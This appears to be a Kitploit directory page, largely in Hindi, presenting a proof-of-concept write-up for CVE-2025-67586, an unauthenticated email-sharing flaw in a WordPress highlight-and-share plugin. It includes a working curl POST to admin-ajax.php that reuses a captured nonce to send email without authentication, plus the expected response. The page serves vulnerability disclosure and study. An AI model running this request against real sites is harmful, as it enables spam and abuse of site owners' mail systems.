Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE — writeups for (CVE-2025-67586, CVE-2025-67985, CVE-2025-67986) | Kitploit
उपकरण/GitHubGitHub/r0xtsec/cve
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubr0xtsec/cve

CVE

writeups for (CVE-2025-67586, CVE-2025-67985, CVE-2025-67986)

रिपॉजिटरी देखें
3 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE

लिखित विवरण (CVE-2025-67586, CVE-2025-67985, CVE-2025-67986) के लिए

root@kitploit:~
--------------   CVE-2025-67586 शोषण PoC   --------------
  • शोषण शीर्षक: वर्डप्रेस प्लगइन 5.2.0 - टूटा एक्सेस नियंत्रण
  • सॉफ्टवेयर लिंक: https://wordpress.org/plugins/highlight-and-share/
  • संस्करण: <= 5.2.0 (आवश्यक)
  • CVE: CVE-2025-67586

==> विवरण DLX प्लगइन्स द्वारा विकसित वर्डप्रेस प्लगइन में एक टूटा एक्सेस नियंत्रण भेद्यता मौजूद है। प्लगइन एक अप्रमाणित AJAX क्रिया को उजागर करता है जो हमलावरों को अनुमति देता है "ईमेल द्वारा साझा करें" कार्यक्षमता का उचित अनुमति जांच के बिना दुरुपयोग करने की।

एक अप्रमाणित हमलावर ईमेल साझाकरण अनुरोधों को ट्रिगर करने के लिए एक वैध पोस्ट नॉन्स का पुन: उपयोग कर सकता है, जिससे उपयोगकर्ता प्रमाणीकरण के बिना अनधिकृत ईमेल भेजना (ईमेल स्पैम / दुरुपयोग) हो सकता है।

==> आवश्यक विशेषाधिकार कोई नहीं (अप्रमाणित)

==> अवधारणा का प्रमाण (PoC)

चरण 1: स्थापित प्लगइन वाली वेबसाइट चुनें

चरण 2: एक वैध नॉन्स प्राप्त करें

  1. एक सार्वजनिक पोस्ट खोलें।
  2. टेक्स्ट को हाइलाइट करें और ईमेल द्वारा साझा करें पर क्लिक करें।
  3. डेवलपर टूल्स → नेटवर्क → XHR खोलें।
  4. एक बार ईमेल भेजें।
  5. अनुरोध कैप्चर करें जिसमें शामिल है: action=has_email_social_modal nonce= post_id=

चरण 3: अप्रमाणित अनुरोध के माध्यम से शोषण करें

bash cmd: (वेबसाइट URL, पोस्ट URL और नॉन्स बदलें)

curl -s -i -X POST 'http://localhost/wp-admin/admin-ajax.php'
-d 'action=has_email_form_submission'
-d 'formData[postId]='
-d 'formData[permalink]=http://localhost/?p='
-d 'formData[nonce]='
-d 'formData[toEmail]=[email protected]'
-d 'formData[subject]=PoC'
-d 'formData[shareText]=POC test'
-d 'formData[emailShareType]=selection'
--compressed

--> अपेक्षित JSON प्रतिक्रिया:

{ "success": true, "data": { "errors": false, "message_title": "This post has been shared!", "message_body": "You have shared this post with [email protected]", "message_subject": "[Shared Post] ", "message_source_name": "Site Name", "message_source_email": "[email protected]" } }

टूल डाउनलोड करें